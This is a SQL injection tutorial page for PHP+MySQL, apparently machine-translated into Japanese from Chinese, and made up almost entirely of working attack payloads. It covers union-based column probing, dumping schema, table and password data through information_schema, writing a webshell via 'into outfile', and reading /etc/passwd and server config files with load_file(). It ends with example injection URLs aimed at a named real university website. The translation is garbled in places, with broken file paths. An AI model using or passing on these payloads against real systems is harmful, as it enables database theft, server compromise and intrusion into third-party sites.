PHP+MySQL 手動インジェクション ステートメントの推奨事項_PHP チュートリアル
- WBOYオリジナル
- 2016-07-21 15:43:44879ブラウズ
暴字段长度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*
利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(Root权限)
条件:1、知道站点物理路径
2、有足够大的权限(可以用select …. from mysql.user测试)
3、magic_quotes_gpc()=OFF
select ‘' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'
load_file() 常用路径:
1.交換(Load_File(0×2F6574632F70617373737764)、0×3c、0×20)
2。Load_file(char(47,101,116,99,47,112,97,115,115,119,100)、char(60)、char(3) )
上記の2つは、PHPファイル内の完全な表示コードを表示するためのもので、「<」などの一部の文字が置換されず、Webページが表示されないことがあります。
3.load_file(char(47 )) FreeBSD と Sunos システムのルートディレクトリを一覧表示できます
4./etc tpd/conf tpd.conf または /usr/local/apche/conf tpd.conf linux APACHE 仮想ホストの表示設定ファイル
5. c:Program FilesApache GroupApacheconf httpd .conf または C:apacheconf httpd.conf WINDOWS システムの Apache ファイルを表示します
6. c:/Resin-3.0.14/conf/resin.conf のレジンファイルの設定情報を表示しますjsp によって開発された Web サイト
7. c:/Resin/conf /resin.conf /usr/local/resin/conf/resin.conf Linux システムに設定された JSP 仮想ホストを表示します
8. d:APACHEApache2confhttpd.conf
9. C:Program Filesmysqlmy.ini
10.../主題/darkblue_orange /layout.inc.php phpmyadmin展開パス
11. c:windowssystem32inetsrvMetaBase.xml IISの仮想ホスト設定ファイルを表示
12. /usr/local/ resin-3.0.22/conf/resin.conf 3.0.22のRESIN設定 ファイルビュー
13. /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14. /usr/local /app/apache2/conf/extra tpd-vhosts.conf APASHE仮想ホストビュー
15 , /etc/sysconfig/iptables ファイアウォールポリシーを参照してください
16. usr/local/app/php5 b/php.ini PHP相当の設定
17. /etc/my.cnf MYSQL設定ファイル
18. /etc/redhat -release Red Hatのシステムバージョン
19. C:mysqldatamysqluser.MYD ユーザーパスワードはMYSQLシステムに存在します
20. /etc/sysconfig /network-scripts/ifcfg-eth0 IPを確認します
21. /usr/local/app/php5 b/php.ini //PHP関連の設定
22./usr/local/app/apache2/conf/extra tpd- vhosts.conf //仮想Webサイトの設定
23. C:Program FilesRhinoSoft.comServ-USvUDaemon.ini
24. c:windowsmy.ini
25. c:boot.ini
一般的に使用される Web サイト設定ファイル config.inc.php、config.php。 load_file() を実行するときは、replace(load_file(HEX), char(60), char(32)) を使用します
注:
Char(60) は
を意味しますChar(32)はスペース
を意味します手動注射中に発生する問題:
注入後、ページに次が表示されます:
操作 'UNION' の照合順序 (latin1_swedish_ci,IMPLICIT) と (utf8_general_ci,IMPLICIT) の不正な組み合わせです
例: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3 、4,user()%20
これは、フロントエンコーディングとバックエンコーディングの間の不一致が原因で発生します。
解決策: パラメーターの前に unhex(hex(parameter)) を追加するだけです。上記の URL は次のように変更できます:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69)) ),3,4,unhex(hex(user()))%20
注射を続けることができます。 。 。